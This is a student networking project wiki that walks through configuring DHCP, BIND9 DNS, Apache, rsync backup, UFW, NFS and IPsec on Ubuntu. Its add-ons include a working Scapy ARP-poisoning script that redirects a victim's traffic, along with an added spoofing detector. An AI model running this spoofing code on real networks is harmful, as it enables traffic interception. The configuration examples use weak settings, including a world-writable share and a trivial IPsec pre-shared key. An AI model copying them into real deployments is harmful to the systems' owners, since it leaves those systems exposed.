Data Networking/Fall 2016/PAKP
Group Members
Ashwin Maniyankode Chandranathan
Kailash Natarajan
Pooja Deshpande
Pranoy Thykkoottathil Jose
Objective
The main objective of this project is to build a secure and dynamic network that provides Dynamic Host Configuration Protocol (DHCP), Domain Name Server (DNS), webserver, firewall and backup services on the Ubuntu Linux operating system.
Behaviour of the Protocols
Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of IP addresses (i.e., a scope) configured for a given network. The DHCP server leases an address to any DHCP-enabled client when it starts up on the network. Since IP addresses are dynamic (leased) rather than static (permanently assigned), addresses which are no longer in use are automatically returned to the pool for reallocation. Both IPv4 and IPv6 addresses can be assigned using a DHCP server.
DHCP supports three mechanisms for IP address allocation.
- Automatic allocation: DHCP assigns an IP address to a client when it receives a request from that client.
- Dynamic allocation: DHCP assigns IP addresses to clients for a specified period of time (or until the client explicitly relinquishes the address). When the lease expires, the client has to request an extension of the lease or request another IP address.
- Manual allocation: Using DHCP, we can assign the same IP to a particular device by using its MAC address as an identifier. For example, a server will always have the same IP, even though it is getting it via the DHCP server.
One or more of these mechanisms will get used depending on the policies of the network administrator.
Domain Name System
DNS is an application layer protocol that translates domain names to IP addresses and vice versa. The basic job of the DNS is to provide simplicity for the application user: it translates the user-friendly domain name into a machine-readable IP address, which is then used to fetch and forward data. With the explosion in the use of the internet and the World Wide Web in commercial, security and social markets, among many others, it is not possible for a user to remember the logical IP addresses of the sites. This is where DNS steps in: the user only needs to remember a user-friendly domain name like www.google.com, which the DNS translates into an IP address such as 8.8.8.8.
Looking further into the behavior of the protocol, the DNS stores DNS records that map a domain name to its corresponding IP addresses, and it responds to queries from the user with answers from its database.
DNS Records are nothing but the database files from which the mappings are fetched. Some of the commonly used DNS records are A, CNAME, MX, PTR, NS.
RECORD TYPE | EXAMPLE NAME | MAPPED DATA | DESCRIPTION |
---|---|---|---|
NS | test.com | dns1.test.com | This record tells the host/user which servers are authoritative and also provides information about the Master and Slave servers of the zone. |
A | dns1.test.com | 192.168.1.1 | This is the most basic type of DNS record, which gives the 32-bit IPv4 address of the domain, i.e. it maps the FQDN to an IP address. |
CNAME | test.com | a.test.com | This record maps the alias mentioned in the FQDN to its canonical name (CNAME). |
MX | test.com | mail.test.com | This record is used for the mapping of mail exchange server information to a specific domain name. |
PTR | 192.168.1.1 | dns1.test.com | This is an interesting record type where the user actually has the IP address of the domain and can map it to a CNAME; these mappings are stored in this record type. |
Webserver & Firewall
A webserver must run on the Linux OS to host a website; Apache2 is the webserver used here. A firewall provides a layer of security by controlling the incoming and outgoing traffic in a network and by blocking and filtering packets before they enter the system. The firewall can protect a whole system or a specific server holding databases or confidential data that must be shielded from unapproved clients inside or outside the system.
Signalling
Dynamic Host Configuration Protocol
1. When a client, configured with the TCP/IP setting “Obtain an IP address automatically (DHCP)”, plugs into a network, it sends out a broadcast from UDP port 68 to UDP port 67 to “DISCOVER” a DHCP Server (or relay agent).
2. The DHCP Server then responds by sending out an “Offer” (through a relay agent if applicable).
3. Then the client sends out a “Request”, requesting an IP address.
4. This request is finally “Acknowledged” by the server so that the client starts using the IP address.
Domain Name Server
1. The requesting host will generate a DNS query packet, which will be passed to the Local DNS Server that is connected to the host network.
2. The Local DNS Server will receive this query and forward it to the appropriate Root Name Server. The Root Name Server will check whether it is a valid domain and whether there are entries for it in its database, and reply to the Local DNS.
3. The Local DNS will then send a query to the TLD DNS Server which will send the details of the Authoritative Name Server which will have the details of the mapping address or name.
4. The Local DNS Server will then send a query to the Authoritative Name server seeking the mapping for the domain name or the IP address which was initially sent by the requesting host.
Webserver
1. The client initiates a TCP connection with the web server IP provider.
2. The connection involves a 3-way handshake mechanism.
3. First, the client sends a SYN message requesting TCP connection to the browser at port 80.
4. The server responds with a SYN-ACK message acknowledging the request and requests the client to open a port for the server to send information.
5. The client responds with the ACK message and also sends a request for the HTML page.
Installation Steps
DHCP
Step 1: Install DHCP server package
sudo apt-get install isc-dhcp-server
Step 2: Edit the isc-dhcp-server file
sudo vim /etc/default/isc-dhcp-server
On line 11 change:
INTERFACES="ens33"
Save and Exit
Step 3: Configure the DHCP server for ipv4
Editing file /etc/dhcp/dhcpd.conf
sudo vim /etc/dhcp/dhcpd.conf
subnet 192.168.10.0 netmask 255.255.255.0 {
    range 192.168.10.30 192.168.10.99;
    option domain-name-servers 192.168.10.10;
    option subnet-mask 255.255.255.0;
    option routers 192.168.10.10;
    option broadcast-address 192.168.10.255;
    default-lease-time 600;
    max-lease-time 7200;
}
The interface's static IPv6 address (an /etc/network/interfaces stanza, not part of dhcpd.conf):
iface eth0 inet6 static
    address 2001:0db8:edfa:1234::1
    netmask 64
    gateway 2001:0db8:edfa:1234::2
For the servers within the network to always have the same IP, we have matched their MAC addresses with a specific IP.
host dns-server {
    hardware ethernet 00:0c:29:8e:69:00;
    fixed-address 192.168.10.10;
}
host web-server {
    hardware ethernet 00:0c:29:5c:7d:2e;
    fixed-address 192.168.10.20;
}
host nfs-server {
    hardware ethernet 00:0c:29:8f:8b:d9;
    fixed-address 192.168.10.15;
}
Step 4 : Set the static IP address of the DHCP server
sudo vim /etc/network/interfaces
auto lo
iface lo inet loopback

auto ens33
iface ens33 inet static
    address 192.168.10.18
    netmask 255.255.255.0
    gateway 192.168.10.1
    broadcast 192.168.10.255
    dns-nameservers 192.168.10.10
Step 5: Edit the resolv.conf file
sudo vim /etc/resolv.conf
nameserver 192.168.10.10
Step 6: Restart the DHCP server
sudo /etc/init.d/isc-dhcp-server restart
Step 7: Configuring the DHCPv6 server
Create a file named dhcpd6.conf
sudo vim /etc/dhcp/dhcpd6.conf
#/etc/dhcp/dhcpd6.conf
default-lease-time 86400;
preferred-lifetime 80000;
allow leasequery;
subnet6 2001:0db8:edfa:1234::/64 {
    # Range for clients
    range6 2001:0db8:edfa:1234:5678::aaaa 2001:0db8:edfa:1234:5678::ffff;
}
DNS Server
In this project all the servers are in a private network and the servers receive their IP addresses from the DHCP server. For configuring DNS, we have used Bind9 (Berkeley Internet Name Domain v9) on Ubuntu so that clients can resolve hostnames and IP addresses.
Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,
Command:
sudo apt-get update
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9
Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”
Command:
cd /etc/network
sudo nano interfaces
auto eth0
iface eth0 inet static
address 192.168.10.10
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255
gateway 192.168.10.1
Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.
Command:
cd /etc
sudo nano hosts
127.0.0.1 localhost
192.168.10.10 ubuntu.project.com Ubuntu
Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.
Command:
cd /etc
sudo nano hostname
ubuntu.project.com
Step 4: Provide the IP address for the Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.
Command:
cd /etc/resolvconf/resolv.conf.d
sudo nano head
nameserver 192.168.10.10
search project.com
Step 5: For the DNS Server we have to specify the forward and the reverse zones that provide forward and reverse domain name resolution. This can be done in the “/etc/bind/named.conf.local” file.
Command:
#Forward Zone
zone "project.com" {
type master; #specifying if the DNS server is master or slave
file "/etc/bind/db.project.com"; #zone file path
allow-transfer { 192.168.10.11; }; # secondary DNS IP
also-notify { 192.168.10.11; }; };
#Reverse Zone
zone "10.168.192.in-addr.arpa" {
type master; #specifying if the DNS server is master or slave
file "/etc/bind/db.192"; #zone file path
allow-transfer { 192.168.10.11; }; # secondary DNS IP
also-notify { 192.168.10.11; }; };
Step 6: Now to add the forwarder IP for the DNS we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the DNS server which can also be added here.
Command:
options {
    forwarders {
        192.168.10.1; #forwarder IP for DNS
    };
};
Step 7: Now we have to create the forward and reverse zone which will act as the database from which the DNS server will look-up to resolve for the Domain name or IP address. This database file can be created with reference to the already existing local database file at – “/etc/bind/db.local” file and making our own copy as the – “/etc/bind/db.project.com” file for the forward zone and “/etc/bind/db.192” file for the reverse zone.
Command:
Forward Zone Database:
cd /etc/bind
sudo cp db.local db.project.com
sudo cp db.local db.192
sudo nano /etc/bind/db.project.com
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ubuntu.project.com. root.project.com. (
9 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ubuntu.project.com.
@ IN A 192.168.10.30
ubuntu IN A 192.168.10.30
web IN A 192.168.10.20
www IN CNAME web.project.com.
@ IN AAAA 2001:db8:edfa:1234::15
ubuntu IN AAAA 2001:db8:edfa:1234::15
;
Note:
• The serial number 9 represents the number of times this database file has been edited; make sure you increment it each time the file is edited.
• The @ symbol means that the record applies in all cases not otherwise specified.
• It is followed by the class IN and the record type: A, CNAME, AAAA or NS.
Reverse Zone Database:
sudo nano /etc/bind/db.192
;
; BIND reverse data file for local loopback interface
;
$TTL 604800
@ IN SOA ubuntu.project.com. root.project.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ubuntu.project.com.
30 IN PTR ubuntu.project.com.
20 IN PTR web.project.com.
20 IN PTR www.web.project.com.
5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa. IN PTR ubuntu.project.com.
;
Note:
• The serial number 6 represents the number of times this database file has been edited; make sure you increment it each time the file is edited.
• The @ symbol means that the record applies in all cases not otherwise specified.
• It is followed by the class IN and the record type: PTR or NS.
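A consistency check for the two zone files above, as an added example that is not part of the original project: it parses a simplified subset of the zone syntax and reports PTR records that do not round-trip to an A record, or that sit outside the reverse zone. The function names and the parser are assumptions; the records are copied from db.project.com and db.192 above, with the SOA block and AAAA lines omitted.

```python
import ipaddress

FORWARD_ORIGIN = "project.com."
REVERSE_ORIGIN = "10.168.192.in-addr.arpa."

# Records copied from the zone files above (SOA block and AAAA lines omitted).
FORWARD_ZONE = """
@       IN NS    ubuntu.project.com.
@       IN A     192.168.10.30
ubuntu  IN A     192.168.10.30
web     IN A     192.168.10.20
www     IN CNAME web.project.com.
"""
REVERSE_ZONE = """
@   IN NS  ubuntu.project.com.
30  IN PTR ubuntu.project.com.
20  IN PTR web.project.com.
20  IN PTR www.web.project.com.
5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa. IN PTR ubuntu.project.com.
"""


def fqdn(name, origin):
    """Expand a name the way BIND does: '@' is the origin, and a name
    without a trailing dot gets the origin appended."""
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"


def parse_records(text, origin):
    """Parse 'owner IN type rdata' lines; ';' comments and other lines are skipped."""
    records = []
    for line in text.splitlines():
        fields = line.split(";", 1)[0].split()
        if len(fields) == 4 and fields[1] == "IN":
            owner, _, rtype, rdata = fields
            records.append((fqdn(owner, origin), rtype, rdata))
    return records


def ptr_owner_to_ip(owner):
    """'30.10.168.192.in-addr.arpa.' -> '192.168.10.30'."""
    labels = owner[: -len(".in-addr.arpa.")].split(".")
    return str(ipaddress.IPv4Address(".".join(reversed(labels))))


def check_reverse(forward_text, reverse_text):
    """Return (ip_or_owner, ptr_target, problem) for every suspicious PTR."""
    addresses, aliases = {}, {}
    for owner, rtype, rdata in parse_records(forward_text, FORWARD_ORIGIN):
        if rtype == "A":
            addresses.setdefault(owner, set()).add(rdata)
        elif rtype == "CNAME":
            aliases[owner] = fqdn(rdata, FORWARD_ORIGIN)
    problems = []
    for owner, rtype, rdata in parse_records(reverse_text, REVERSE_ORIGIN):
        if rtype != "PTR":
            continue
        # A missing trailing dot on the target makes BIND append the origin.
        target = fqdn(rdata, REVERSE_ORIGIN)
        if not owner.endswith("." + REVERSE_ORIGIN):
            # BIND ignores out-of-zone data when it loads the file.
            problems.append((owner, target, "owner is outside this zone"))
            continue
        ip = ptr_owner_to_ip(owner)
        name = aliases.get(target, target)  # follow one CNAME hop
        if name not in addresses:
            problems.append((ip, target, "no A record for PTR target"))
        elif ip not in addresses[name]:
            problems.append((ip, target, "A record points elsewhere"))
    return problems


if __name__ == "__main__":
    for where, target, problem in check_reverse(FORWARD_ZONE, REVERSE_ZONE):
        print(f"{where} -> {target}: {problem}")
```

On the records above it reports the PTR to www.web.project.com., which has no forward record, and the ip6.arpa entry, which does not belong in the 10.168.192.in-addr.arpa zone file.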
Step 8: Now that we have defined the database and the name servers for the DNS server, we have to restart the server for the configurations to take effect.
Command:
sudo systemctl restart bind9
sudo init 6
Configuring Secondary DNS
The primary DNS provides domain name resolution for the clients. If the primary DNS fails, the clients will not be able to resolve domain names and will be cut off from using the web. To overcome this, it is advisable to have a secondary DNS server which acts as a backup in case the primary DNS fails. It is relatively easy to configure the secondary DNS once the primary DNS is configured.
Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,
Command:
sudo apt-get update
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9
Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”
Command:
cd /etc/network
sudo nano interfaces
auto eth0
iface eth0 inet static
address 192.168.10.11
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255
gateway 192.168.10.1
Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.
Command:
cd /etc
sudo nano hosts
127.0.0.1 localhost
192.168.10.11 ubuntu.project.com ubuntu
Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.
Command:
cd /etc
sudo nano hostname
ubuntu.project.com
Step 4: Provide the IP address for the Secondary Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.
Command:
cd /etc/resolvconf/resolv.conf.d
sudo nano head
nameserver 192.168.10.11
search project.com
Step 5: For the Secondary DNS Server we have to specify the forward and the reverse zones that provide forward and reverse domain name resolution. This can be done in the “/etc/bind/named.conf.local” file.
Command:
#Forward Zone
zone "project.com" {
type slave; #specifying if the DNS server is master or slave
file "/etc/bind/db.project.com"; #zone file path
masters { 192.168.10.10; }; # primary DNS IP
};
#Reverse Zone
zone "10.168.192.in-addr.arpa" {
type slave; #specifying if the DNS server is master or slave
file "/etc/bind/db.192"; #zone file path
masters { 192.168.10.10; }; # primary DNS IP
};
Step 6: Now to add the forwarder IP for the secondary DNS, we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the secondary DNS server which can also be added here.
Command:
options {
    forwarders {
        192.168.10.1; #forwarder IP for DNS
    };
};
Step 7: Now that we have defined the database and the name servers for the secondary DNS server, we have to restart the server for the configurations to take effect.
Command:
sudo systemctl restart bind9
sudo init 6
Webserver
Step 1: To Install Apache2 Webserver
Command:
sudo apt-get install apache2
Step 2: To Check whether the web server is able to listen on port 80
Command:
netstat -a | more
Step 3: To restart the web server
Command:
sudo /etc/init.d/apache2 restart
Step 4: To develop a webpage for the server
Command:
cd /var/www/html
sudo nano index.html
Webserver Backup
The protocols used for backup are rsync and ssh.
Rsync is a protocol used to synchronize files in Ubuntu. It updates only the data that is not yet synchronized with the backup file.
The ssh protocol provides a secure channel to send and receive files on Unix machines. It uses encryption and decryption at the end users.
Crontab is used for scheduling backups.
Step 1: Install rsync
sudo apt-get install rsync
Step 2: Install ssh
sudo apt-get install openssh-server
Step 3: Create a public and a private key for security
ssh-keygen -t rsa
Step 4: Append new public key
cat .ssh/id_rsa.pub | ssh ashwinmc1@192.168.10.15 'cat >> .ssh/authorized_keys'
Step 5: Edit crontab
crontab -e
Step 6: Schedule and run the rsync command from the crontab to automate the backup of the webserver
25 * * * * rsync -avzP --delete -e ssh /var/www/html ashwinmc1@192.168.10.15:/home/ashwinmc1/Backup
Firewall
Step 1: Install UFW package
sudo apt-get install ufw
Step 2: Check UFW status
sudo ufw status
Step 3: Set Up Default Policies
sudo ufw default deny incoming
sudo ufw default allow outgoing
Step 4: Allow SSH, HTTP, FTP and HTTPS connections
sudo ufw allow from 192.168.10.0/24 to any port 443
sudo ufw allow from 192.168.10.0/24 to any port 80
sudo ufw allow from 192.168.10.0/24 to any port 21
sudo ufw allow from 192.168.10.0/24 to any port 22
Step 5: Disabling ping
sudo nano /etc/ufw/before.rules
Comment out this line:
-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT
Step 6: Enable UFW
sudo ufw enable
Algorithm
1. A client tries to connect to the network.
2. Once the client gets connected, he'll try to obtain an IP via DHCP. So a broadcast message will be sent out requesting an IP.
3. The DHCP server will provide an IP address to the client if the request is successful.
Otherwise, 'request fail' message will be obtained and we will need to contact the network administrator for help.
4. The client will now try to access the web server.
If the domain name server details obtained via DHCP is correct, a request will be sent to DNS to resolve the IP address of the domain.
DNS will then reply with IP address of the web page.
else if DNS reply fails, an error message will be displayed saying, ‘server not found.’
else if URL entered is wrong, an error message will be displayed saying, ‘webpage unavailable.’
Retry
5. Client accessed the web server. Now he sends HTTP request to the server.
if the request is successful, the Web page will be displayed
else Error message like ‘no data received’ will be displayed.
Retry
Flow Chart
Flow chart has been provided in the project report.
Add-ons Implemented (Additional Features)
ARP Poisoning
ARP poisoning has been implemented using Scapy.
# Import scapy
from scapy.all import *

# Setting variables
attIP="192.168.10.39"
attMAC="00:0c:29:7b:64:65"
vicIP="192.168.10.40"
vicMAC="00:0c:29:60:af:21"
dgwIP="192.168.10.20"
dgwMAC="00:0c:29:5c:7d:2e"

# Forge the ARP packet for the victim
arpFakeVic = ARP()
arpFakeVic.op=2
arpFakeVic.psrc=dgwIP
arpFakeVic.pdst=vicIP
arpFakeVic.hwdst=vicMAC

# Forge the ARP packet for the default GW
arpFakeDGW = ARP()
arpFakeDGW.op=2
arpFakeDGW.psrc=vicIP
arpFakeDGW.pdst=dgwIP
arpFakeDGW.hwdst=dgwMAC

# While loop to send ARP
# when the cache is not spoofed
while True:
    # Send the ARP replies
    send(arpFakeVic)
    send(arpFakeDGW)
    print "ARP sent"
    # Wait for a ARP replies from the default GW
    sniff(filter="arp and host 10.0.0.1 or host 10.0.0.209", count=1)
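Seen from the defender's side, forged replies like these show up as one IP address suddenly being claimed by a different MAC address. The detector below is an added example, not part of the original project: it runs over a constructed list of observed ARP replies that reuses the lab addresses from the variables above, and the function name, the alert labels and the trusted-binding table are assumptions.

```python
from collections import defaultdict

# Known-good binding for 192.168.10.20, matching the web-server
# fixed-address entry in dhcpd.conf (use of such a table is an assumption).
TRUSTED = {"192.168.10.20": "00:0c:29:5c:7d:2e"}

# Constructed sample of observed ARP replies as (sender IP, sender MAC).
OBSERVED = [
    ("192.168.10.20", "00:0c:29:5c:7d:2e"),  # genuine reply
    ("192.168.10.40", "00:0c:29:60:af:21"),  # genuine reply
    ("192.168.10.20", "00:0c:29:7b:64:65"),  # forged: wrong MAC for .20
    ("192.168.10.40", "00:0c:29:7b:64:65"),  # forged: .40 changes MAC
    ("192.168.10.20", "00:0c:29:7b:64:65"),  # repeated forgery
    ("192.168.10.39", "00:0c:29:7b:64:65"),  # the sender's own address
]


def detect_arp_spoofing(replies, trusted=None):
    """Return de-duplicated alerts for three symptoms of ARP cache poisoning:
    a reply that contradicts a trusted binding, an IP whose MAC changes
    after it was first learned, and one MAC claiming several IPs."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    learned = {}                # ip -> first MAC seen for it
    claimed = defaultdict(set)  # mac -> every IP it has claimed
    alerts = []

    def add(alert):
        # The spoofing loop repeats its replies, so report each finding once.
        if alert not in alerts:
            alerts.append(alert)

    for ip, mac in replies:
        mac = mac.lower()
        claimed[mac].add(ip)
        if ip in trusted:
            if mac != trusted[ip]:
                add(("trusted-mismatch", ip, mac))
        elif ip in learned and learned[ip] != mac:
            add(("binding-changed", ip, mac))
        else:
            learned.setdefault(ip, mac)

    # A host with several legitimate addresses also trips this check,
    # so treat it as a lead to investigate rather than proof.
    for mac, ips in claimed.items():
        if len(ips) > 1:
            add(("mac-claims-many-ips", mac, tuple(sorted(ips))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(OBSERVED, TRUSTED):
        print(alert)
```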
NFS
Step 1: Configuring the NFS-server
Command:
sudo apt-get install nfs-kernel-server
sudo chmod 777 location
Edit the file
sudo nano /etc/exports
On the last line append below
/home/ashwinmc1/mnt 192.168.10.0/255.255.255.0(rw,sync,root_squash,subtree_check)
Save and Exit
Change the directory
cd /home/ashwinmc1/mnt
touch newfile
sudo nano newfile
Start the server
sudo service nfs-kernel-server start
Step 2: Configuring the NFS-client
Command to Install NFS client:
sudo apt-get install nfs-common
Make a directory at the client mount location (here /home/mnt), then mount the server path (/home/ashwinmc1/mnt on 192.168.10.15) on it:
sudo mount 192.168.10.15:/home/ashwinmc1/mnt /home/mnt
sudo reboot
sudo mount -a
IPSEC VPN
IPSEC VPN has been implemented using the 'strongswan' package. IPSEC VPN helps make the connection between two servers more secure and it also makes sure that sniffing cannot be done between them.
VPN First Server Configuration
Step 1: Installing the 'strongswan' package
Command:
apt-get install ipsec-tools strongswan-starter
Step 2: Making the crypto map entries
Edit the /etc/ipsec.conf file
Command:
vim /etc/ipsec.conf
conn red-to-blue
    authby=secret
    auto=route
    keyexchange=ike
    left=192.168.10.100
    right=192.168.10.200
    type=tunnel
    esp=aes128gcm16!
Step 3: Make the PSK entries
We need to edit the /etc/ipsec.secrets file
Command:
vim /etc/ipsec.secrets
192.168.10.100 192.168.10.200 : PSK "project"
Step 4: Restart the ipsec service
Command:
ipsec restart
VPN Second Server Configuration
Step 1: Installing the 'strongswan' package
Command:
apt-get install ipsec-tools strongswan-starter
Step 2: Making the crypto map entries
Edit the /etc/ipsec.conf file
Command:
vim /etc/ipsec.conf
conn blue-to-red
    authby=secret
    auto=route
    keyexchange=ike
    left=192.168.10.200
    right=192.168.10.100
    type=tunnel
    esp=aes128gcm16!
Step 3: Make the PSK entries
We need to edit the /etc/ipsec.secrets file
Command:
vim /etc/ipsec.secrets
192.168.10.100 192.168.10.200 : PSK "project"
Step 4: Restart the ipsec service
Command:
ipsec restart
Testing
DHCP Test
If the clients are able to get IP addresses from the range defined in the server pool, then DHCP is working properly.
For example, since the DHCPv4 address pool is assigned from 192.168.10.30 to 192.168.10.99 and the DHCPv6 pool is assigned from 2001:0db8:edfa:1234:5678::aaaa to 2001:0db8:edfa:1234:5678::ffff, if a client gets assigned an IP address of 192.168.10.36 & 2001:0db8:edfa:1234:5678::aaa1 through DHCP, then the DHCP server is assigning IP addresses correctly and is functioning properly.
We can also see the status of the DHCP servers by using the commands:
systemctl status isc-dhcp-server
systemctl status isc-dhcp-server6
DNS Test
For testing the functioning and effectiveness of DNS, the following commands will be useful:
1) Dig
The Domain Information Groper is used to query DNS name servers. It performs DNS lookups and returns the response from the name servers.
E.g., we can perform a dig from the secondary DNS using the following command:
dig @192.168.10.10 project.com AXFR
This will return the records from the master server.
2) Ping
Ping is used for checking the network layer status of the server. This can be performed on both the master and the slave DNS to check out if they are reachable from both.
3) Nslookup
nslookup is a command used to query DNS servers. Interactive mode gives permission to the user to query the name servers for getting information about hosts and domains. Non-interactive mode gives permission to the user for printing just the name and the information that is requested for a particular host or domain.
4) Host
Host is used for DNS lookups. It resolves hostnames to IP addresses and vice versa.
Webserver Test
Open the web browser and enter the host name or the local IP address. If it is working, then the web server is up and running.
Firewall Test
A client can try to ping the servers that are blocked. If the response is 'request timed-out', then the firewall has blocked the client and it is working as per the firewall rules.
VPN Test
To test IPSEC VPN, run a continuous ping from one server to the other. Simultaneously, run the command:
watch ipsec statusall
or
tcpdump esp
If the number of packets increases in the first case, or if you see packets arriving in the second case, then the IPSEC tunnel is configured properly.
ARP Poisoning Test
When the client tries to access the webpage, if he/she is redirected to the hacked page, then ARP poisoning has been properly implemented.
Future Scope
1. Implementing AAA servers for added security.
2. Additional Firewall rules for added security.
3. Adding Mail servers.
4. Expanding server capabilities.
5. Increase the number of DNS for load distribution and decentralization.